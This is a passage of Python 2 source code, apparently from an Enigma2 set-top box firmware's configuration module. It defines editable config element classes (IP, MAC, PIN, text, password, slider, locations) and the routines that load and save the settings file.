newvalue = oldvalue - olddec + (10 ** (number_len - posinblock - 1) * number)
self._value[blocknumber] = newvalue
self.marked_pos += 1
self.validate()
self.changed()
def genText(self):
value = ""
mPos = self.marked_pos
num = 0
for i in self._value:
if value: #fixme no heading separator possible
value += self.seperator
if mPos >= len(value) - 1:
mPos += 1
if self.censor_char == "":
value += ("%0" + str(len(str(self.limits[num][1]))) + "d") % i
else:
value += (self.censor_char * len(str(self.limits[num][1])))
num += 1
return value, mPos
def getText(self):
(value, mPos) = self.genText()
return value
def getMulti(self, selected):
(value, mPos) = self.genText()
# only mark cursor when we are selected
# (this code is heavily ink optimized!)
if self.enabled:
return "mtext"[1-selected:], value, [mPos]
else:
return "text", value
def tostring(self, val):
return self.seperator.join([self.saveSingle(x) for x in val])
def saveSingle(self, v):
return str(v)
def fromstring(self, value):
return [int(x) for x in value.split(self.seperator)]
def onDeselect(self, session):
if self.last_value != self._value:
self.changedFinal()
self.last_value = copy_copy(self._value)
ip_limits = [(0,255),(0,255),(0,255),(0,255)]
class ConfigIP(ConfigSequence):
def __init__(self, default, auto_jump = False):
ConfigSequence.__init__(self, seperator = ".", limits = ip_limits, default = default)
self.block_len = [len(str(x[1])) for x in self.limits]
self.marked_block = 0
self.overwrite = True
self.auto_jump = auto_jump
def handleKey(self, key):
if key == KEY_LEFT:
if self.marked_block > 0:
self.marked_block -= 1
self.overwrite = True
elif key == KEY_RIGHT:
if self.marked_block < len(self.limits)-1:
self.marked_block += 1
self.overwrite = True
elif key == KEY_HOME:
self.marked_block = 0
self.overwrite = True
elif key == KEY_END:
self.marked_block = len(self.limits)-1
self.overwrite = True
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
oldvalue = self._value[self.marked_block]
if self.overwrite:
self._value[self.marked_block] = number
self.overwrite = False
else:
oldvalue *= 10
newvalue = oldvalue + number
if self.auto_jump and newvalue > self.limits[self.marked_block][1] and self.marked_block < len(self.limits)-1:
self.handleKey(KEY_RIGHT)
self.handleKey(key)
return
else:
self._value[self.marked_block] = newvalue
if len(str(self._value[self.marked_block])) >= self.block_len[self.marked_block]:
self.handleKey(KEY_RIGHT)
self.validate()
self.changed()
def genText(self):
value = ""
block_strlen = []
for i in self._value:
block_strlen.append(len(str(i)))
if value:
value += self.seperator
value += str(i)
leftPos = sum(block_strlen[:self.marked_block])+self.marked_block
rightPos = sum(block_strlen[:(self.marked_block+1)])+self.marked_block
mBlock = range(leftPos, rightPos)
return value, mBlock
def getMulti(self, selected):
(value, mBlock) = self.genText()
if self.enabled:
return "mtext"[1-selected:], value, mBlock
else:
return "text", value
def getHTML(self, id):
# we definitely don't want leading zeros
return '.'.join(["%d" % d for d in self.value])
mac_limits = [(1,255),(1,255),(1,255),(1,255),(1,255),(1,255)]
class ConfigMAC(ConfigSequence):
def __init__(self, default):
ConfigSequence.__init__(self, seperator = ":", limits = mac_limits, default = default)
class ConfigMacText(ConfigElement, NumericalTextInput):
def __init__(self, default = "", visible_width = False):
ConfigElement.__init__(self)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False)
self.marked_pos = 0
self.allmarked = (default != "")
self.fixed_size = 17
self.visible_width = visible_width
self.offset = 0
self.overwrite = 17
self.help_window = None
self.value = self.last_value = self.default = default
self.useableChars = '0123456789ABCDEF'
def validateMarker(self):
textlen = len(self.text)
if self.marked_pos > textlen-1:
self.marked_pos = textlen-1
elif self.marked_pos < 0:
self.marked_pos = 0
def insertChar(self, ch, pos, owr):
if self.text[pos] == ':':
pos += 1
if owr or self.overwrite:
self.text = self.text[0:pos] + ch + self.text[pos + 1:]
elif self.fixed_size:
self.text = self.text[0:pos] + ch + self.text[pos:-1]
else:
self.text = self.text[0:pos] + ch + self.text[pos:]
def handleKey(self, key):
if key == KEY_LEFT:
self.timeout()
if self.allmarked:
self.marked_pos = len(self.text)
self.allmarked = False
else:
if self.text[self.marked_pos-1] == ':':
self.marked_pos -= 2
else:
self.marked_pos -= 1
elif key == KEY_RIGHT:
self.timeout()
if self.allmarked:
self.marked_pos = 0
self.allmarked = False
else:
if self.marked_pos < (len(self.text)-1):
if self.text[self.marked_pos+1] == ':':
self.marked_pos += 2
else:
self.marked_pos += 1
elif key in KEY_NUMBERS:
owr = self.lastKey == getKeyNumber(key)
newChar = self.getKey(getKeyNumber(key))
self.insertChar(newChar, self.marked_pos, owr)
elif key == KEY_TIMEOUT:
self.timeout()
if self.help_window:
self.help_window.update(self)
if self.text[self.marked_pos] == ':':
self.marked_pos += 1
return
if self.help_window:
self.help_window.update(self)
self.validateMarker()
self.changed()
def nextFunc(self):
self.marked_pos += 1
self.validateMarker()
self.changed()
def getValue(self):
try:
return self.text.encode("utf-8")
except UnicodeDecodeError:
print "Broken UTF8!"
return self.text
def setValue(self, val):
try:
self.text = val.decode("utf-8")
except UnicodeDecodeError:
self.text = val.decode("utf-8", "ignore")
print "Broken UTF8!"
value = property(getValue, setValue)
_value = property(getValue, setValue)
def getText(self):
return self.text.encode("utf-8")
def getMulti(self, selected):
if self.visible_width:
if self.allmarked:
mark = range(0, min(self.visible_width, len(self.text)))
else:
mark = [self.marked_pos-self.offset]
return "mtext"[1-selected:], self.text[self.offset:self.offset+self.visible_width].encode("utf-8")+" ", mark
else:
if self.allmarked:
mark = range(0, len(self.text))
else:
mark = [self.marked_pos]
return "mtext"[1-selected:], self.text.encode("utf-8")+" ", mark
def onSelect(self, session):
self.allmarked = (self.value != "")
if session is not None:
from Screens.NumericalTextInputHelpDialog import NumericalTextInputHelpDialog
self.help_window = session.instantiateDialog(NumericalTextInputHelpDialog, self)
self.help_window.setAnimationMode(0)
self.help_window.show()
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if self.help_window:
session.deleteDialog(self.help_window)
self.help_window = None
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
def getHTML(self, id):
return '<input type="text" name="' + id + '" value="' + self.value + '" /><br>\n'
def unsafeAssign(self, value):
self.value = str(value)
class ConfigPosition(ConfigSequence):
def __init__(self, default, args):
ConfigSequence.__init__(self, seperator = ",", limits = [(0,args[0]),(0,args[1]),(0,args[2]),(0,args[3])], default = default)
clock_limits = [(0,23),(0,59)]
class ConfigClock(ConfigSequence):
def __init__(self, default):
t = localtime(default)
ConfigSequence.__init__(self, seperator = ":", limits = clock_limits, default = [t.tm_hour, t.tm_min])
def increment(self):
# Check if Minutes maxed out
if self._value[1] == 59:
# Increment Hour, reset Minutes
if self._value[0] < 23:
self._value[0] += 1
else:
self._value[0] = 0
self._value[1] = 0
else:
# Increment Minutes
self._value[1] += 1
# Trigger change
self.changed()
def decrement(self):
# Check if Minutes is minimum
if self._value[1] == 0:
# Decrement Hour, set Minutes to 59
if self._value[0] > 0:
self._value[0] -= 1
else:
self._value[0] = 23
self._value[1] = 59
else:
# Decrement Minutes
self._value[1] -= 1
# Trigger change
self.changed()
integer_limits = (0, 9999999999)
class ConfigInteger(ConfigSequence):
def __init__(self, default, limits = integer_limits):
ConfigSequence.__init__(self, seperator = ":", limits = [limits], default = default)
# you need to override this to do input validation
def setValue(self, value):
self._value = [value]
self.changed()
def getValue(self):
return self._value[0]
value = property(getValue, setValue)
def fromstring(self, value):
return int(value)
def tostring(self, value):
return str(value)
class ConfigPIN(ConfigInteger):
def __init__(self, default, len = 4, censor = ""):
assert isinstance(default, int), "ConfigPIN default must be an integer"
ConfigSequence.__init__(self, seperator = ":", limits = [(0, (10**len)-1)], censor_char = censor, default = default)
self.len = len
def getLength(self):
return self.len
class ConfigFloat(ConfigSequence):
def __init__(self, default, limits):
ConfigSequence.__init__(self, seperator = ".", limits = limits, default = default)
def getFloat(self):
return float(self.value[1] / float(self.limits[1][1] + 1) + self.value[0])
float = property(getFloat)
# an editable text...
class ConfigText(ConfigElement, NumericalTextInput):
def __init__(self, default = "", fixed_size = True, visible_width = False):
ConfigElement.__init__(self)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False)
self.marked_pos = 0
self.allmarked = (default != "")
self.fixed_size = fixed_size
self.visible_width = visible_width
self.offset = 0
self.overwrite = fixed_size
self.help_window = None
self.value = self.last_value = self.default = default
def validateMarker(self):
textlen = len(self.text)
if self.fixed_size:
if self.marked_pos > textlen-1:
self.marked_pos = textlen-1
else:
if self.marked_pos > textlen:
self.marked_pos = textlen
if self.marked_pos < 0:
self.marked_pos = 0
if self.visible_width:
if self.marked_pos < self.offset:
self.offset = self.marked_pos
if self.marked_pos >= self.offset + self.visible_width:
if self.marked_pos == textlen:
self.offset = self.marked_pos - self.visible_width
else:
self.offset = self.marked_pos - self.visible_width + 1
if self.offset > 0 and self.offset + self.visible_width > textlen:
self.offset = max(0, len - self.visible_width)
def insertChar(self, ch, pos, owr):
if owr or self.overwrite:
self.text = self.text[0:pos] + ch + self.text[pos + 1:]
elif self.fixed_size:
self.text = self.text[0:pos] + ch + self.text[pos:-1]
else:
self.text = self.text[0:pos] + ch + self.text[pos:]
def deleteChar(self, pos):
if not self.fixed_size:
self.text = self.text[0:pos] + self.text[pos + 1:]
elif self.overwrite:
self.text = self.text[0:pos] + " " + self.text[pos + 1:]
else:
self.text = self.text[0:pos] + self.text[pos + 1:] + " "
def deleteAllChars(self):
if self.fixed_size:
self.text = " " * len(self.text)
else:
self.text = ""
self.marked_pos = 0
def handleKey(self, key):
# this will no change anything on the value itself
# so we can handle it here in gui element
if key == KEY_DELETE:
self.timeout()
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
else:
self.deleteChar(self.marked_pos)
if self.fixed_size and self.overwrite:
self.marked_pos += 1
elif key == KEY_BACKSPACE:
self.timeout()
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
elif self.marked_pos > 0:
self.deleteChar(self.marked_pos-1)
if not self.fixed_size and self.offset > 0:
self.offset -= 1
self.marked_pos -= 1
elif key == KEY_LEFT:
self.timeout()
if self.allmarked:
self.marked_pos = len(self.text)
self.allmarked = False
else:
self.marked_pos -= 1
elif key == KEY_RIGHT:
self.timeout()
if self.allmarked:
self.marked_pos = 0
self.allmarked = False
else:
self.marked_pos += 1
elif key == KEY_HOME:
self.timeout()
self.allmarked = False
self.marked_pos = 0
elif key == KEY_END:
self.timeout()
self.allmarked = False
self.marked_pos = len(self.text)
elif key == KEY_TOGGLEOW:
self.timeout()
self.overwrite = not self.overwrite
elif key == KEY_ASCII:
self.timeout()
newChar = unichr(getPrevAsciiCode())
if not self.useableChars or newChar in self.useableChars:
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, False)
self.marked_pos += 1
elif key in KEY_NUMBERS:
owr = self.lastKey == getKeyNumber(key)
newChar = self.getKey(getKeyNumber(key))
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, owr)
elif key == KEY_TIMEOUT:
self.timeout()
if self.help_window:
self.help_window.update(self)
return
if self.help_window:
self.help_window.update(self)
self.validateMarker()
self.changed()
def nextFunc(self):
self.marked_pos += 1
self.validateMarker()
self.changed()
def getValue(self):
try:
return self.text.encode("utf-8")
except UnicodeDecodeError:
print "Broken UTF8!"
return self.text
def setValue(self, val):
try:
self.text = val.decode("utf-8")
except UnicodeDecodeError:
self.text = val.decode("utf-8", "ignore")
print "Broken UTF8!"
value = property(getValue, setValue)
_value = property(getValue, setValue)
def getText(self):
return self.text.encode("utf-8")
def getMulti(self, selected):
if self.visible_width:
if self.allmarked:
mark = range(0, min(self.visible_width, len(self.text)))
else:
mark = [self.marked_pos-self.offset]
return "mtext"[1-selected:], self.text[self.offset:self.offset+self.visible_width].encode("utf-8")+" ", mark
else:
if self.allmarked:
mark = range(0, len(self.text))
else:
mark = [self.marked_pos]
return "mtext"[1-selected:], self.text.encode("utf-8")+" ", mark
def onSelect(self, session):
self.allmarked = (self.value != "")
if session is not None:
from Screens.NumericalTextInputHelpDialog import NumericalTextInputHelpDialog
self.help_window = session.instantiateDialog(NumericalTextInputHelpDialog, self)
self.help_window.setAnimationMode(0)
self.help_window.show()
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if self.help_window:
session.deleteDialog(self.help_window)
self.help_window = None
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
def getHTML(self, id):
return '<input type="text" name="' + id + '" value="' + self.value + '" /><br>\n'
def unsafeAssign(self, value):
self.value = str(value)
class ConfigPassword(ConfigText):
def __init__(self, default = "", fixed_size = False, visible_width = False, censor = "*"):
ConfigText.__init__(self, default = default, fixed_size = fixed_size, visible_width = visible_width)
self.censor_char = censor
self.hidden = True
def getMulti(self, selected):
mtext, text, mark = ConfigText.getMulti(self, selected)
if self.hidden:
text = len(text) * self.censor_char
return mtext, text, mark
def onSelect(self, session):
ConfigText.onSelect(self, session)
self.hidden = False
def onDeselect(self, session):
ConfigText.onDeselect(self, session)
self.hidden = True
# lets the user select between [min, min+stepwidth, min+(stepwidth*2)..., maxval] with maxval <= max depending
# on the stepwidth
# min, max, stepwidth, default are int values
# wraparound: pressing RIGHT key at max value brings you to min value and vice versa if set to True
class ConfigSelectionNumber(ConfigSelection):
def __init__(self, min, max, stepwidth, default = None, wraparound = False):
self.wraparound = wraparound
if default is None:
default = min
default = str(default)
choices = []
step = min
while step <= max:
choices.append(str(step))
step += stepwidth
ConfigSelection.__init__(self, choices, default)
def getValue(self):
return int(ConfigSelection.getValue(self))
def setValue(self, val):
ConfigSelection.setValue(self, str(val))
value = property(getValue, setValue)
def getIndex(self):
return self.choices.index(self.value)
index = property(getIndex)
def handleKey(self, key):
if not self.wraparound:
if key == KEY_RIGHT:
if len(self.choices) == (self.choices.index(str(self.value)) + 1):
return
if key == KEY_LEFT:
if self.choices.index(str(self.value)) == 0:
return
nchoices = len(self.choices)
if nchoices > 1:
i = self.choices.index(str(self.value))
if key == KEY_LEFT:
self.value = self.choices[(i + nchoices - 1) % nchoices]
elif key == KEY_RIGHT:
self.value = self.choices[(i + 1) % nchoices]
elif key == KEY_HOME:
self.value = self.choices[0]
elif key == KEY_END:
self.value = self.choices[nchoices - 1]
class ConfigNumber(ConfigText):
def __init__(self, default = 0):
ConfigText.__init__(self, str(default), fixed_size = False)
def getValue(self):
return int(self.text)
def setValue(self, val):
self.text = str(val)
value = property(getValue, setValue)
_value = property(getValue, setValue)
def isChanged(self):
sv = self.saved_value
strv = self.tostring(self.value)
if sv is None and strv == self.default:
return False
return strv != sv
def conform(self):
pos = len(self.text) - self.marked_pos
self.text = self.text.lstrip("0")
if self.text == "":
self.text = "0"
if pos > len(self.text):
self.marked_pos = 0
else:
self.marked_pos = len(self.text) - pos
def handleKey(self, key):
if key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
ascii = getPrevAsciiCode()
if not (48 <= ascii <= 57):
return
else:
ascii = getKeyNumber(key) + 48
newChar = unichr(ascii)
if self.allmarked:
self.deleteAllChars()
self.allmarked = False
self.insertChar(newChar, self.marked_pos, False)
self.marked_pos += 1
else:
ConfigText.handleKey(self, key)
self.conform()
def onSelect(self, session):
self.allmarked = (self.value != "")
def onDeselect(self, session):
self.marked_pos = 0
self.offset = 0
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
class ConfigSearchText(ConfigText):
def __init__(self, default = "", fixed_size = False, visible_width = False):
ConfigText.__init__(self, default = default, fixed_size = fixed_size, visible_width = visible_width)
NumericalTextInput.__init__(self, nextFunc = self.nextFunc, handleTimeout = False, search = True)
class ConfigDirectory(ConfigText):
def __init__(self, default="", visible_width=60):
ConfigText.__init__(self, default, fixed_size = True, visible_width = visible_width)
def handleKey(self, key):
pass
def getValue(self):
if self.text == "":
return None
else:
return ConfigText.getValue(self)
def setValue(self, val):
if val is None:
val = ""
ConfigText.setValue(self, val)
def getMulti(self, selected):
if self.text == "":
return "mtext"[1-selected:], _("List of storage devices"), range(0)
else:
return ConfigText.getMulti(self, selected)
def onSelect(self, session):
self.allmarked = (self.value != "")
# a slider.
class ConfigSlider(ConfigElement):
def __init__(self, default = 0, increment = 1, limits = (0, 100)):
ConfigElement.__init__(self)
self.value = self.last_value = self.default = default
self.min = limits[0]
self.max = limits[1]
self.increment = increment
def checkValues(self):
if self.value < self.min:
self.value = self.min
if self.value > self.max:
self.value = self.max
def handleKey(self, key):
if key == KEY_LEFT:
self.value -= self.increment
elif key == KEY_RIGHT:
self.value += self.increment
elif key == KEY_HOME:
self.value = self.min
elif key == KEY_END:
self.value = self.max
else:
return
self.checkValues()
def getText(self):
return "%d / %d" % (self.value, self.max)
def getMulti(self, selected):
self.checkValues()
return "slider", self.value, self.max
def fromstring(self, value):
return int(value)
# a satlist. in fact, it's a ConfigSelection.
class ConfigSatlist(ConfigSelection):
def __init__(self, list, default = None):
if default is not None:
default = str(default)
ConfigSelection.__init__(self, choices = [(str(orbpos), desc) for (orbpos, desc, flags) in list], default = default)
def getOrbitalPosition(self):
if self.value == "":
return None
return int(self.value)
orbital_position = property(getOrbitalPosition)
class ConfigSet(ConfigElement):
def __init__(self, choices, default=None):
if not default: default = []
ConfigElement.__init__(self)
if isinstance(choices, list):
choices.sort()
self.choices = choicesList(choices, choicesList.LIST_TYPE_LIST)
else:
assert False, "ConfigSet choices must be a list!"
if default is None:
default = []
self.pos = -1
default.sort()
self.last_value = self.default = default
self.value = default[:]
def toggleChoice(self, choice):
value = self.value
if choice in value:
value.remove(choice)
else:
value.append(choice)
value.sort()
self.changed()
def handleKey(self, key):
if key in KEY_NUMBERS + [KEY_DELETE, KEY_BACKSPACE]:
if self.pos != -1:
self.toggleChoice(self.choices[self.pos])
elif key == KEY_LEFT:
if self.pos < 0:
self.pos = len(self.choices)-1
else:
self.pos -= 1
elif key == KEY_RIGHT:
if self.pos >= len(self.choices)-1:
self.pos = -1
else:
self.pos += 1
elif key in (KEY_HOME, KEY_END):
self.pos = -1
def genString(self, lst):
res = ""
for x in lst:
res += self.description[x]+" "
return res
def getText(self):
return self.genString(self.value)
def getMulti(self, selected):
if not selected or self.pos == -1:
return "text", self.genString(self.value)
else:
tmp = self.value[:]
ch = self.choices[self.pos]
mem = ch in self.value
if not mem:
tmp.append(ch)
tmp.sort()
ind = tmp.index(ch)
val1 = self.genString(tmp[:ind])
val2 = " "+self.genString(tmp[ind+1:])
if mem:
chstr = " "+self.description[ch]+" "
else:
chstr = "("+self.description[ch]+")"
len_val1 = len(val1)
return "mtext", val1+chstr+val2, range(len_val1, len_val1 + len(chstr))
def onDeselect(self, session):
self.pos = -1
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value[:]
def tostring(self, value):
return str(value)
def fromstring(self, val):
return eval(val)
description = property(lambda self: descriptionList(self.choices.choices, choicesList.LIST_TYPE_LIST))
class ConfigLocations(ConfigElement):
def __init__(self, default=None, visible_width=False):
if not default: default = []
ConfigElement.__init__(self)
self.visible_width = visible_width
self.pos = -1
self.default = default
self.locations = []
self.mountpoints = []
self.value = default[:]
def setValue(self, value):
locations = self.locations
loc = [x[0] for x in locations if x[3]]
add = [x for x in value if not x in loc]
diff = add + [x for x in loc if not x in value]
locations = [x for x in locations if not x[0] in diff] + [[x, self.getMountpoint(x), True, True] for x in add]
#locations.sort(key = lambda x: x[0])
self.locations = locations
self.changed()
def getValue(self):
self.checkChangedMountpoints()
locations = self.locations
for x in locations:
x[3] = x[2]
return [x[0] for x in locations if x[3]]
value = property(getValue, setValue)
def tostring(self, value):
return str(value)
def fromstring(self, val):
return eval(val)
def load(self):
sv = self.saved_value
if sv is None:
tmp = self.default
else:
tmp = self.fromstring(sv)
locations = [[x, None, False, False] for x in tmp]
self.refreshMountpoints()
for x in locations:
if fileExists(x[0]):
x[1] = self.getMountpoint(x[0])
x[2] = True
self.locations = locations
def save(self):
locations = self.locations
if self.save_disabled or not locations:
self.saved_value = None
else:
self.saved_value = self.tostring([x[0] for x in locations])
def isChanged(self):
sv = self.saved_value
locations = self.locations
if val is None and not locations:
return False
return self.tostring([x[0] for x in locations]) != sv
def addedMount(self, mp):
for x in self.locations:
if x[1] == mp:
x[2] = True
elif x[1] is None and fileExists(x[0]):
x[1] = self.getMountpoint(x[0])
x[2] = True
def removedMount(self, mp):
for x in self.locations:
if x[1] == mp:
x[2] = False
def refreshMountpoints(self):
self.mountpoints = [p.mountpoint for p in harddiskmanager.getMountedPartitions() if p.mountpoint != "/"]
self.mountpoints.sort(key = lambda x: -len(x))
def checkChangedMountpoints(self):
oldmounts = self.mountpoints
self.refreshMountpoints()
newmounts = self.mountpoints
if oldmounts == newmounts:
return
for x in oldmounts:
if not x in newmounts:
self.removedMount(x)
for x in newmounts:
if not x in oldmounts:
self.addedMount(x)
def getMountpoint(self, file):
file = os_path.realpath(file)+"/"
for m in self.mountpoints:
if file.startswith(m):
return m
return None
def handleKey(self, key):
if key == KEY_LEFT:
self.pos -= 1
if self.pos < -1:
self.pos = len(self.value)-1
elif key == KEY_RIGHT:
self.pos += 1
if self.pos >= len(self.value):
self.pos = -1
elif key in (KEY_HOME, KEY_END):
self.pos = -1
def getText(self):
return " ".join(self.value)
def getMulti(self, selected):
if not selected:
valstr = " ".join(self.value)
if self.visible_width and len(valstr) > self.visible_width:
return "text", valstr[0:self.visible_width]
else:
return "text", valstr
else:
i = 0
valstr = ""
ind1 = 0
ind2 = 0
for val in self.value:
if i == self.pos:
ind1 = len(valstr)
valstr += str(val)+" "
if i == self.pos:
ind2 = len(valstr)
i += 1
if self.visible_width and len(valstr) > self.visible_width:
if ind1+1 < self.visible_width/2:
off = 0
else:
off = min(ind1+1-self.visible_width/2, len(valstr)-self.visible_width)
return "mtext", valstr[off:off+self.visible_width], range(ind1-off,ind2-off)
else:
return "mtext", valstr, range(ind1,ind2)
def onDeselect(self, session):
self.pos = -1
# nothing.
class ConfigNothing(ConfigSelection):
def __init__(self):
ConfigSelection.__init__(self, choices = [("","")])
# until here, 'saved_value' always had to be a *string*.
# now, in ConfigSubsection, and only there, saved_value
# is a dict, essentially forming a tree.
#
# config.foo.bar=True
# config.foobar=False
#
# turns into:
# config.saved_value == {"foo": {"bar": "True"}, "foobar": "False"}
#
class ConfigSubsectionContent(object):
pass
# we store a backup of the loaded configuration
# data in self.stored_values, to be able to deploy
# them when a new config element will be added,
# so non-default values are instantly available
# A list, for example:
# config.dipswitches = ConfigSubList()
# config.dipswitches.append(ConfigYesNo())
# config.dipswitches.append(ConfigYesNo())
# config.dipswitches.append(ConfigYesNo())
class ConfigSubList(list, object):
def __init__(self):
list.__init__(self)
self.stored_values = {}
def save(self):
for x in self:
x.save()
def load(self):
for x in self:
x.load()
def getSavedValue(self):
res = { }
for i, val in enumerate(self):
sv = val.saved_value
if sv is not None:
res[str(i)] = sv
return res
def setSavedValue(self, values):
self.stored_values = dict(values)
for (key, val) in self.stored_values.items():
if int(key) < len(self):
self[int(key)].saved_value = val
saved_value = property(getSavedValue, setSavedValue)
def append(self, item):
i = str(len(self))
list.append(self, item)
if i in self.stored_values:
item.saved_value = self.stored_values[i]
item.load()
def dict(self):
return dict([(str(index), value) for index, value in enumerate(self)])
# same as ConfigSubList, just as a dictionary.
# care must be taken that the 'key' has a proper
# str() method, because it will be used in the config
# file.
class ConfigSubDict(dict, object):
def __init__(self):
dict.__init__(self)
self.stored_values = {}
def save(self):
for x in self.values():
x.save()
def load(self):
for x in self.values():
x.load()
def getSavedValue(self):
res = {}
for (key, val) in self.items():
sv = val.saved_value
if sv is not None:
res[str(key)] = sv
return res
def setSavedValue(self, values):
self.stored_values = dict(values)
for (key, val) in self.items():
if str(key) in self.stored_values:
val.saved_value = self.stored_values[str(key)]
saved_value = property(getSavedValue, setSavedValue)
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
if str(key) in self.stored_values:
item.saved_value = self.stored_values[str(key)]
item.load()
def dict(self):
return self
# Like the classes above, just with a more "native"
# syntax.
#
# some evil stuff must be done to allow instant
# loading of added elements. this is why this class
# is so complex.
#
# we need the 'content' because we overwrite
# __setattr__.
# If you don't understand this, try adding
# __setattr__ to a usual exisiting class and you will.
class ConfigSubsection(object):
def __init__(self):
self.__dict__["content"] = ConfigSubsectionContent()
self.content.items = { }
self.content.stored_values = { }
def __setattr__(self, name, value):
if name == "saved_value":
return self.setSavedValue(value)
assert isinstance(value, (ConfigSubsection, ConfigElement, ConfigSubList, ConfigSubDict)), "ConfigSubsections can only store ConfigSubsections, ConfigSubLists, ConfigSubDicts or ConfigElements"
content = self.content
content.items[name] = value
x = content.stored_values.get(name, None)
if x is not None:
#print "ok, now we have a new item,", name, "and have the following value for it:", x
value.saved_value = x
value.load()
def __getattr__(self, name):
return self.content.items[name]
def getSavedValue(self):
res = self.content.stored_values
for (key, val) in self.content.items.items():
sv = val.saved_value
if sv is not None:
res[key] = sv
elif key in res:
del res[key]
return res
def setSavedValue(self, values):
values = dict(values)
self.content.stored_values = values
for (key, val) in self.content.items.items():
value = values.get(key, None)
if value is not None:
val.saved_value = value
saved_value = property(getSavedValue, setSavedValue)
def save(self):
for x in self.content.items.values():
x.save()
def load(self):
for x in self.content.items.values():
x.load()
def dict(self):
return self.content.items
# the root config object, which also can "pickle" (=serialize)
# down the whole config tree.
#
# we try to keep non-existing config entries, to apply them whenever
# a new config entry is added to a subsection
# also, non-existing config entries will be saved, so they won't be
# lost when a config entry disappears.
class Config(ConfigSubsection):
def __init__(self):
ConfigSubsection.__init__(self)
def pickle_this(self, prefix, topickle, result):
for (key, val) in topickle.items():
name = '.'.join((prefix, key))
if isinstance(val, dict):
self.pickle_this(name, val, result)
elif isinstance(val, tuple):
result += [name, '=', str(val[0]), '\n']
else:
result += [name, '=', str(val), '\n']
def pickle(self):
result = []
self.pickle_this("config", self.saved_value, result)
return ''.join(result)
def unpickle(self, lines, base_file=True):
tree = { }
configbase = tree.setdefault("config", {})
for l in lines:
if not l or l[0] == '#':
continue
result = l.split('=', 1)
if len(result) != 2:
continue
(name, val) = result
val = val.strip()
names = name.split('.')
base = configbase
for n in names[1:-1]:
base = base.setdefault(n, {})
base[names[-1]] = val
if not base_file: # not the initial config file..
#update config.x.y.value when exist
try:
configEntry = eval(name)
if configEntry is not None:
configEntry.value = val
except (SyntaxError, KeyError):
pass
# we inherit from ConfigSubsection, so ...
#object.__setattr__(self, "saved_value", tree["config"])
if "config" in tree:
self.setSavedValue(tree["config"])
def saveToFile(self, filename):
text = self.pickle()
try:
import os
f = open(filename + ".writing", "w")
f.write(text)
f.flush()
os.fsync(f.fileno())
f.close()
os.rename(filename + ".writing", filename)
except IOError:
print "Config: Couldn't write %s" % filename
def loadFromFile(self, filename, base_file=True):
self.unpickle(open(filename, "r"), base_file)
config = Config()
config.misc = ConfigSubsection()
class ConfigFile:
def __init__(self):
pass
CONFIG_FILE = resolveFilename(SCOPE_CONFIG, "settings")
def load(self):
try:
config.loadFromFile(self.CONFIG_FILE, True)
print "Config file loaded ok..."
except IOError, e:
print "unable to load config (%s), assuming defaults..." % str(e)
def save(self):
# config.save()
config.saveToFile(self.CONFIG_FILE)
def __resolveValue(self, pickles, cmap):
key = pickles[0]
if cmap.has_key(key):
if len(pickles) > 1:
return self.__resolveValue(pickles[1:], cmap[key].dict())
else:
return str(cmap[key].value)
return None
def getResolvedKey(self, key):
names = key.split('.')
if len(names) > 1:
if names[0] == "config":
ret=self.__resolveValue(names[1:], config.content.items)
if ret and len(ret):
return ret
print "getResolvedKey", key, "failed !! (Typo??)"
return ""
def NoSave(element):
element.disableSave()
return element
configfile = ConfigFile()
configfile.load()
def getConfigListEntry(*args):
assert len(args) > 1, "getConfigListEntry needs a minimum of two arguments (descr, configElement)"
return args
def updateConfigElement(element, newelement):
newelement.value = element.value
return newelement
#def _(x):
# return x
#
#config.bla = ConfigSubsection()
#config.bla.test = ConfigYesNo()
#config.nim = ConfigSubList()
#config.nim.append(ConfigSubsection())
#config.nim[0].bla = ConfigYesNo()
#config.nim.append(ConfigSubsection())
#config.nim[1].bla = ConfigYesNo()
#config.nim[1].blub = ConfigYesNo()
#config.arg = ConfigSubDict()
#config.arg["Hello"] = ConfigYesNo()
#
#config.arg["Hello"].handleKey(KEY_RIGHT)
#config.arg["Hello"].handleKey(KEY_RIGHT)
#
##config.saved_value
#
##configfile.save()
#config.save()
#print config.pickle()
cec_limits = [(0,15),(0,15),(0,15),(0,15)]
class ConfigCECAddress(ConfigSequence):
def __init__(self, default, auto_jump = False):
ConfigSequence.__init__(self, seperator = ".", limits = cec_limits, default = default)
self.block_len = [len(str(x[1])) for x in self.limits]
self.marked_block = 0
self.overwrite = True
self.auto_jump = auto_jump
def handleKey(self, key):
if key == KEY_LEFT:
if self.marked_block > 0:
self.marked_block -= 1
self.overwrite = True
elif key == KEY_RIGHT:
if self.marked_block < len(self.limits)-1:
self.marked_block += 1
self.overwrite = True
elif key == KEY_HOME:
self.marked_block = 0
self.overwrite = True
elif key == KEY_END:
self.marked_block = len(self.limits)-1
self.overwrite = True
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
oldvalue = self._value[self.marked_block]
if self.overwrite:
self._value[self.marked_block] = number
self.overwrite = False
else:
oldvalue *= 10
newvalue = oldvalue + number
if self.auto_jump and newvalue > self.limits[self.marked_block][1] and self.marked_block < len(self.limits)-1:
self.handleKey(KEY_RIGHT)
self.handleKey(key)
return
else:
self._value[self.marked_block] = newvalue
if len(str(self._value[self.marked_block])) >= self.block_len[self.marked_block]:
self.handleKey(KEY_RIGHT)
self.validate()
self.changed()
def genText(self):
value = ""
block_strlen = []
for i in self._value:
block_strlen.append(len(str(i)))
if value:
value += self.seperator
value += str(i)
